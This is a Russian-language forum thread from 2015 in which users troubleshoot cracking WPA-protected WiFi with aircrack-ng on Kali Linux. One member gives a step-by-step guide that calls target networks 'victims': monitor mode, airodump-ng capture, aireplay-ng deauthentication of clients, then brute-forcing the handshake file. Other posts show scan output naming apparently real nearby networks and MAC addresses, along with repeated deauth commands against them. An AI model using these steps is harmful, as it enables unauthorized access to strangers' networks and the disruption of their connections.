 |
|
12.05.2015, 16:59
|
|
Banned
Регистрация: 16.12.2011
Сообщений: 82
С нами:
7582646
Репутация:
0
|
|
Сообщение от Василий-Шишкин
Можете написать целый код или хотябы пример, я новичок в этом не могу так сходу все понимать.
- minidwep-gtk это прога, где в Kali она не знаю, пользуюсь WIFISLAX.
|
|
|
12.05.2015, 17:57
|
|
Познающий
Регистрация: 06.09.2013
Сообщений: 40
С нами:
6675446
Репутация:
1
|
|
может кто разжувать поподробнее как урезать cap файл?
|
|
|
|
12.05.2015, 21:46
|
|
New Member
Регистрация: 12.05.2015
Сообщений: 1
С нами:
5792726
Репутация:
0
|
|
Здравствуйте все !
Задам риторический вопрос Windows 8.1 64 WiFi RTL 8812UA TP-Link очень долго при загрузке поднимается WIFI сетка, кто знает как ускорить этот процесс - загрузка драйвера и подъем соединения WiFi !
Конечно это тривиально, но может кто знает т.к. на устройстве нет проводной сети ! Спс.!
|
|
|
|
12.05.2015, 22:11
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 51
С нами:
5797046
Репутация:
1
|
|
Добрый вечер.
Во время перехвата хендшейка, появилась проблема: при отключении клиентов от сети (роутера) пишет: No such BSSID available. Вот что я делал:
- нашел роутеров и клиентов
Код:
CH 7 ][ Elapsed: 8 s ][ 2015-05-12 20:27
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:31:52:24:62:5F -69 4 0 0 6 54e. WPA2 CCMP PSK cln_wifi_mgts
54:04:A6:5B:9D:94 -66 15 0 0 5 54e WPA2 CCMP PSK MosUrGarant
B8:A3:86:6B:F5:CC -68 2 0 0 6 54e WPA2 CCMP PSK WE_ARE_HERE
1C:AF:F7:82:6A:62 -67 9 0 0 6 54 WPA2 TKIP PSK dlink
BA:2B:C1:5A:15:A7 -1 4 0 0 10 54 OPN Portthru
C4:6E:1F:A4:B6:C0 -57 18 0 0 3 54e. WPA CCMP PSK cosmos13287
64:70:02:A1:BA:AE -48 15 0 0 11 54e. WPA2 CCMP PSK TechNoServ
C2:4A:00:7F:B2:6E -47 20 0 0 11 54 . WPA CCMP PSK
C0:4A:00:7F:B2:6E -49 17 0 0 11 54e. WPA2 CCMP MGT TechnoServCORP
E4:68:A3:10:04:DE -55 9 0 0 11 54e. WPA2 CCMP PSK MGTS_112
10:FE:ED:F6:52:31 -53 38 0 0 6 54e. WPA2 CCMP PSK PPRB Hotel 5
4E:5D:4E:4B:93:E8 -56 24 0 0 5 54e WPA2 CCMP PSK MosUrGarant
94:04:9C:62:D7:98 -59 12 0 0 11 54e WPA2 CCMP PSK MGTS 119
10:FE:ED:F6:47:EB -62 6 0 0 2 54e. WPA2 CCMP PSK PPRB Hotel 4
4C:5E:0C:6A:E0:85 -47 10 0 0 4 54e. WPA2 CCMP PSK MKT-Wireless
4E:5D:4E:4B:93:E9 -55 25 0 0 5 54e WPA2 CCMP PSK MosUr
E4:68:A3:10:0A:F6 -63 15 0 0 6 54e. WPA2 CCMP PSK mgts-115
7C:B7:33:25:7E:84 -65 4 1 0 6 54e WPA2 CCMP PSK AKADO-7E7E
EC:43:F6:05:34:88 -65 4 0 0 2 54e WPA2 CCMP PSK ALGO_WIFI
08:60:6E:EF:1A:98 -62 17 1 0 11 54e WPA2 CCMP PSK Home126-2
C8:D3:A3:EC:95:5A -66 13 0 0 11 54e WPA CCMP PSK DSL-2740U
F8:C0:91:13:B2:FF -67 10 0 0 8 54e WPA2 CCMP PSK onlime9
7C:B7:33:26:84:08 -66 3 1 0 1 54e WPA2 CCMP PSK AKADO-8402
E4:68:A3:0F:DC:98 -65 12 0 0 6 54e. WPA2 CCMP PSK mgts-111
60:33:4B:E3:54:C7 -65 7 0 0 7 54e. WPA2 CCMP PSK Apple Forevah Nah
00:27:22:E8:1E:3C -67 10 0 0 8 54e. WPA TKIP PSK UBNT10780
B8:BE:BF:EF:83:19 -69 3 0 0 1 54e. WPA2 CCMP PSK CLASS-211
1C:BD:B9:B2:43:02 -69 5 0 0 11 54e. WPA2 CCMP PSK dlink-dlink
00:17:31:1B:03:E2 -70 4 0 0 1 54 WPA TKIP PSK Tata-77
00:24:8C:A0:46:E5 -68 13 1 0 6 54 WPA TKIP PSK tsj
10:FE:ED:F6:4E:ED -72 2 0 0 2 54e. WPA2 CCMP PSK PPRB Hotel 4
E0:CE:C3:C6:F5:C6 -73 2 1 0 8 54e WPA2 CCMP PSK AKADO-F5C0
BSSID STATION PWR Rate Lost Frames Probe
BA:2B:C1:5A:15:A7 00:15:99:B0:75:A0 -73 0 - 1 31 4
(not associated) 00:C0:CA:81:EC:0E -9 0 - 1 0 2
(not associated) AC:38:70:92:07:4D -65 0 - 1 0 1
(not associated) 00:18:DE:D0:BD:EA -69 0 - 1 17 7 Spacenet
(not associated) F8:D1:11:08:31:51 -69 0 - 1 0 1 mgts-148
(not associated) 00:16:EB:1F:65:E4 -69 0 - 1 48 10 AKADO-24B8
(not associated) 84:7A:88:97:06:C8 -73 0 - 1 44 5
(not associated) 24:0A:64:74:54:53 -71 0 - 1 0 1
- выбрал нужный канал и BSSID
Код:
CH 10 ][ Elapsed: 38 mins ][ 2015-05-12 21:06 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
BA:2B:C1:5A:15:A7 -1 0 2978 0 0 10 54 OPN P
BSSID STATION PWR Rate Lost Frames Probe
BA:2B:C1:5A:15:A7 00:15:99:B0:75:A0 -73 0 - 1 0 2983
И самое интересное, пытаюсь отключить клиента ( со всех сайтов команды пробовал) :
Код:
root@kali-Linux:~# aireplay-ng -1 9999 -e Portthru -a BA:2B:C1:5A:15:A7 -c 00:15:99:B0:75:A0 --ignore-negative-one mon0No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:08:43 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:08:54 No such BSSID available.
root@kali-Linux:~# aireplay-ng -1 6000 -e Portthru -a BA:2B:C1:5A:15:A7 --ignore-negative-one mon0
No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:09:03 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:09:13 No such BSSID available.
root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 --ignore-negative-one mon0
No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:09:30 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:09:40 No such BSSID available.
root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 -c 00:15:99:B0:75:A0 --ignore-negative-one mon0
No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:09:57 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:10:07 No such BSSID available.
root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 -h 00:15:99:B0:75:A0 --ignore-negative-one mon0
The interface MAC (9C:AD:97:4D:37:19) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:15:99:B0:75:A0
21:10:16 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:10:26 No such BSSID available.
Что я не пробовал резудьтат один.
А ждать пока клиент сам оключится от сети, это может только завтра произойти.
------------------------------------------------------------------------------------------------------------------------------------------------------------
Плохой, конечно, пример выбрал, так как сеть эта открыта, но суть не в этом есть море примеров:
Код:
root@kali-Linux:~# aireplay-ng -1 9999 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB --ignore-negative-one mon0
No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:28:59 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1
21:29:09 No such BSSID available.
Этот пример с закрытой сетью (WPA2). |
|
|
|
12.05.2015, 22:29
|
|
Member
Регистрация: 30.01.2012
Сообщений: 37
С нами:
7517846
Репутация:
0
|
|
Сообщение от Василий-Шишкин
Можете написать целый код или хотябы пример, я новичок в этом не могу так сходу все понимать.
1. Останавливаешь wifi адаптер командой:
ifconfig wlanX down (где X это номер твоего адаптера, узнать можно командой ifconfig -a)
2. Убиваешь мешающие процессы командой
airmon-ng wlanX check kill
3. Запускаешь режим мониторинга
airmon-ng start wlanX (появится адаптер mon0)
4. Далее смотришь не спеша по каналам выбирая жертву
airodump-ng mon0 -a -c 6 (-а не показывать неассоциированных клиентов, т.е. просто wifi устройства не подключенные к сети - с 6 - шестой канал, смотреть нужно по каналам так сразу видишь качество приема жертвы на конкретном канале, записываешь мак жертвы: точнее два мака точки доступа и клиента)
5. Выбрав жертву отключаешь аирдамп и запускаешь мониторить именно жертву
airodump-ng mon0 -a -d MM:MM:MM:MM:MM:MM -c 6 -w filename (тут MM:MM:MM:MM:MM:MM mac точки доступа жертвы, канал также шестой нужно поставит на тот на котором сидит жертва, -w записать пойманные данные в файл с именем filename)
6. Одновременно не отключая аирдампа в соседней консоли даешь команду
aireplay-ng mon0 -a MM:MM:MM:MM:MM:MM -c CC:CC:CC:CC:CC:CC -0 5 (тут MM:MM:MM:MM:MM:MM - мак точки доступа жертвы, СС:СС:СС:СС:СС:СС мак клиента жертвы, -0 команда на отключения клиента от точки доступа, 5 - количество попыток отключения) Как дашь команду не торопись подожди минутку смотря на первую консоль, не пойман ли шендшейк, если не пойман то повтори попытку отключения клиента от точки доступа и во второй консоле. После пойманного хендшейка брутишь файл filename.cap. Чем брутить это уже другое дело либо тут выложить кто нибудь да поможет, или самому.
Ну вот вроде все разжевал.
Для отсутствия ошибки fixset channel -1 не подымай основной интерфейс.
|
|
|
|
12.05.2015, 22:41
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 51
С нами:
5797046
Репутация:
1
|
|
Сообщение от Biship
1. Останавливаешь wifi адаптер командой:
ifconfig wlanX down (где X это номер твоего адаптера, узнать можно командой ifconfig -a)
2. Убиваешь мешающие процессы командой
airmon-ng wlanX check kill
3. Запускаешь режим мониторинга
airmon-ng start wlanX (появится адаптер mon0)
4. Далее смотришь не спеша по каналам выбирая жертву
airodump-ng mon0 -a -c 6 (-а не показывать неассоциированных клиентов, т.е. просто wifi устройства не подключенные к сети - с 6 - шестой канал, смотреть нужно по каналам так сразу видишь качество приема жертвы на конкретном канале, записываешь мак жертвы: точнее два мака точки доступа и клиента)
5. Выбрав жертву отключаешь аирдамп и запускаешь мониторить именно жертву
airodump-ng mon0 -a -d MM:MM:MM:MM:MM:MM -c 6 -w filename (тут MM:MM:MM:MM:MM:MM mac точки доступа жертвы, канал также шестой нужно поставит на тот на котором сидит жертва, -w записать пойманные данные в файл с именем filename)
6. Одновременно не отключая аирдампа в соседней консоли даешь команду
aireplay-ng mon0 -a MM:MM:MM:MM:MM:MM -c CC:CC:CC:CC:CC:CC -0 5 (тут MM:MM:MM:MM:MM:MM - мак точки доступа жертвы, СС:СС:СС:СС:СС:СС мак клиента жертвы, -0 команда на отключения клиента от точки доступа, 5 - количество попыток отключения) Как дашь команду не торопись подожди минутку смотря на первую консоль, не пойман ли шендшейк, если не пойман то повтори попытку отключения клиента от точки доступа и во второй консоле. После пойманного хендшейка брутишь файл filename.cap. Чем брутить это уже другое дело либо тут выложить кто нибудь да поможет, или самому.
Ну вот вроде все разжевал.
Для отсутствия ошибки fixset channel -1 не подымай основной интерфейс.
Спасибо все понятно, польшенство я так и делал. Вот у вас под цифрой 6: вывод такой у меня:
Код:
root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:39:31 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1
21:39:41 No such BSSID available.
Только не понял:
Для отсутствия ошибки fixset channel -1 не подымай основной интерфейс.
Как это не поднимать основной интерфейс
|
|
|
|
12.05.2015, 22:47
|
|
Member
Регистрация: 30.01.2012
Сообщений: 37
С нами:
7517846
Репутация:
0
|
|
Сообщение от Василий-Шишкин
Спасибо все понятно, польшенство я так и делал. Вот у вас под цифрой 6: вывод такой у меня:
Код:
root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:39:31 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1
21:39:41 No such BSSID available.
Только не понял:
Как это не поднимать основной интерфейс
так и не поднимать, если ты под кали просто попробуй ifconfig wlanX down а работать будешь с новым mon0, и в aireplay не надо указывать оба параметра -e и -a достаточно просто -a
|
|
|
|
12.05.2015, 22:59
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 51
С нами:
5797046
Репутация:
1
|
|
Сообщение от Biship
так и не поднимать, если ты под кали просто попробуй ifconfig wlanX down а работать будешь с новым mon0, и в aireplay не надо указывать оба параметра -e и -a достаточно просто -a
Да верно, спасибо ошибка ушла:
Код:
CH 10 ][ Elapsed: 0 s ][ 2015-05-12 21:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 9 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -67 0 - 1 13 9
А вот в отключенни ESSID все равно требует, и ошибка не ушла:
Код:
root@kali-Linux:~# aireplay-ng mon0 -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:55:37 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
21:55:47 No such BSSID available.
Please specify an ESSID (-e).
root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:56:54 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
21:57:04 No such BSSID available.
|
|
|
|
12.05.2015, 23:09
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 51
С нами:
5797046
Репутация:
1
|
|
Интересно он в строке fixset channel вот что пишет:
Код:
CH 10 ][ Elapsed: 9 mins ][ 2015-05-12 22:07 ][ fixed channel mon0: 13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 3257 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -63 0 - 1 38 3257
С 1 по (примерно) 15 подбирает, я зафиксировал 13. Так и должно быть?
WLAN0 отключен:
Код:
root@kali-Linux:~# ifconfig
eth0 Link encap:Ethernet HWaddr 28:d2:44:a9:92:6c
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:112 errors:0 dropped:0 overruns:0 frame:0
TX packets:112 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6720 (6.5 KiB) TX bytes:6720 (6.5 KiB)
mon0 Link encap:UNSPEC HWaddr 9C-AD-97-4D-37-19-3A-30-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:590118 errors:0 dropped:14140 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:122378467 (116.7 MiB) TX bytes:0 (0.0 B)
usb0 Link encap:Ethernet HWaddr 36:4b:50:b7:ef:2d
inet addr:192.168.0.182 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::344b:50ff:feb7:ef2d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19581 errors:0 dropped:0 overruns:0 frame:0
TX packets:19497 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17222457 (16.4 MiB) TX bytes:2192415 (2.0 MiB)
Потому что в начале мониторинга этого не наблюдается:
Код:
CH 10 ][ Elapsed: 16 s ][ 2015-05-12 22:14
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 130 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -67 0 - 1 19 130
|
|
|
|
12.05.2015, 23:14
|
|
Member
Регистрация: 30.01.2012
Сообщений: 37
С нами:
7517846
Репутация:
0
|
|
Сообщение от Василий-Шишкин
Да верно, спасибо ошибка ушла:
Код:
CH 10 ][ Elapsed: 0 s ][ 2015-05-12 21:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 9 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -67 0 - 1 13 9
А вот в отключенни ESSID все равно требует, и ошибка не ушла:
Код:
root@kali-Linux:~# aireplay-ng mon0 -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:55:37 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
21:55:47 No such BSSID available.
Please specify an ESSID (-e).
root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:56:54 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
21:57:04 No such BSSID available.
Судя по показаниям аирдампа точка доступа далеко и ты видишь только клинета, попробуй на другой жертве. желательно чтобы показатель RXQ был близок к 100. Почитай об использовании направленных антенн есть такой форум по антеннам lan23.ru там множество конструкций антенн для нашего дела из подручных материалов.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
